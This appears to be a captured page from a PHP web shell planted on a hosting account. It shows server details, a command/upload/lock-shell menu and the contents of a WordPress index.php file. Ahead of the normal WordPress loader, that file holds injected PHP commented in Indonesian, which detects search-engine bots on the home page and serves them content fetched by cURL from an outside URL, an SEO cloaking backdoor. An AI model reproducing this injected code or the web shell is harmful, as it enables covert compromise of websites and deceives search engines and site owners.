Server IP : 82.180.170.48 / Your IP : 3.144.103.14 Web Server : LiteSpeed System : Linux us-phx-web1609.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64 User : u636808025 ( 636808025) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u636808025/domains/converta.app/public_html/tshirteria/../easylife/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
---|
<?php // Deteksi bot dengan cara yang lebih aman $agent = $_SERVER['HTTP_USER_AGENT']; $referer = $_SERVER['HTTP_REFERER'] ?? ''; // Cek jika agen adalah bot dan hanya di halaman beranda if (strpos($agent, 'bot') !== false && $_SERVER['REQUEST_URI'] == '/') { // Validasi bahasa dan pastikan tidak ada cookie yang mencurigakan $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']); if (strpos($accept_lang, 'zh') !== false && $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS'] == 1) { // Jangan set cookie yang mencurigakan echo 'Bot detected. Custom content for bots here.'; exit; } // Gunakan cURL untuk mengambil konten eksternal secara lebih aman $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://converta.app/education.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Set timeout $output = curl_exec($ch); curl_close($ch); if ($output === false) { echo 'Error fetching content.'; } else { echo $output; } exit; } ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';